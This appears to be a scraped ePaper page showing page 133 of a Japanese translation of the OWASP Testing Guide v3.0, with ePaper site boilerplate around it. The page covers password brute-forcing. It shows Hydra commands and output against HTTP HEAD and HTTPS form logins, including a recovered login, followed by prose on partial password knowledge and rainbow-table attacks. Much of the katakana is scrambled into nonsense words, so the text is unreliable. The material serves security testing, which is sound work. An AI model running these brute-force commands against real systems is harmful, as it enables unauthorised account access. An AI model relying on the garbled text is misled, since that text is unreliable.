11.05.2014 Views

OWASP テスティングガイド

OWASP テスティングガイド

OWASP テスティングガイド

SHOW MORE
SHOW LESS

Create successful ePaper yourself

Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.

[DATA] 16 tasks, 1 servers, 1638 login tries (l:2/p:819), ~102 tries per task<br />

[DATA] attacking service http-head on port 80<br />

[STATUS] 792.00 tries/min, 792 tries in 00:01h, 846 todo in 00:02h<br />

[80][www] host: 10.0.0.1 login: owasp password: password<br />

[STATUS] attack finished for www.site.com (waiting for childs to finish)<br />

Hydra (http://www.thc.org) finished at 2009-07-04 18:16:34<br />

raven@blackbox /hydra $<br />

HTML フォーマベース 認 証 のブルーテフォース 攻 撃<br />

raven@blackbox /hydra $ ./hydra -L users.txt -P words.txt www.site.com https-post-form<br />

"/index.cgi:login&name=^USER^&password=^PASS^&login=Login:Not allowed" &<br />

Hydra v5.3 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.<br />

Hydra (http://www.thc.org)starting at 2009-07-04 19:16:17<br />

[DATA] 16 tasks, 1 servers, 1638 login tries (l:2/p:819), ~102 tries per task<br />

[DATA] attacking service http-post-form on port 443<br />

[STATUS] attack finished for wiki.intranet (waiting for childs to finish)<br />

[443] host: 10.0.0.1 login: owasp password: password<br />

[STATUS] attack finished for www.site.com (waiting for childs to finish)<br />

Hydra (http://www.thc.org) finished at 2009-07-04 19:18:34<br />

raven@blackbox /hydra $<br />

<strong>OWASP</strong> Testing Guide v3.0<br />

ギレーボチクステステとその 例<br />

パスワローデとアカウンヱテについての 部 分 的 な 知 識<br />

パシワロード(アォウヱト)の 長 さや 構 造造 についての 情 報 があれば、ブラートフェーシ 攻 撃 が 成 功 する 可 能 性 が 高 くなります。 実<br />

際 、 文 字 の 数 を 制 限 し、パシワロード 長 を 決 めると、パシワロードの 総 数 はかなり 減 少 します。<br />

ミムリーテレーデオフ 攻 撃<br />

ミムヨートリードエフ 攻 撃 を 行 うには、アプヨクーサュヱを 攻 撃 ( 例 、SQL イヱザェキサュヱ)するか、HTTP トョフィッキを 盗 聴 し、<br />

少 なくとも 事 前 にパシワロードハッサャを 必 要 とします。 今 日 、この 種 の 最 も 一 般 的 な 攻 撃 は、リイヱペウテーブラに 基 づいて<br />

います。リイヱペウテーブラは、 一 方 向 ハッサャによって 生 成 される 暗 号 文 から 平 文 パシワロードを 解 読 するために 使 わわれま<br />

す。<br />

133

Hooray! Your file is uploaded and ready to be published.

Saved successfully!

Ooh no, something went wrong!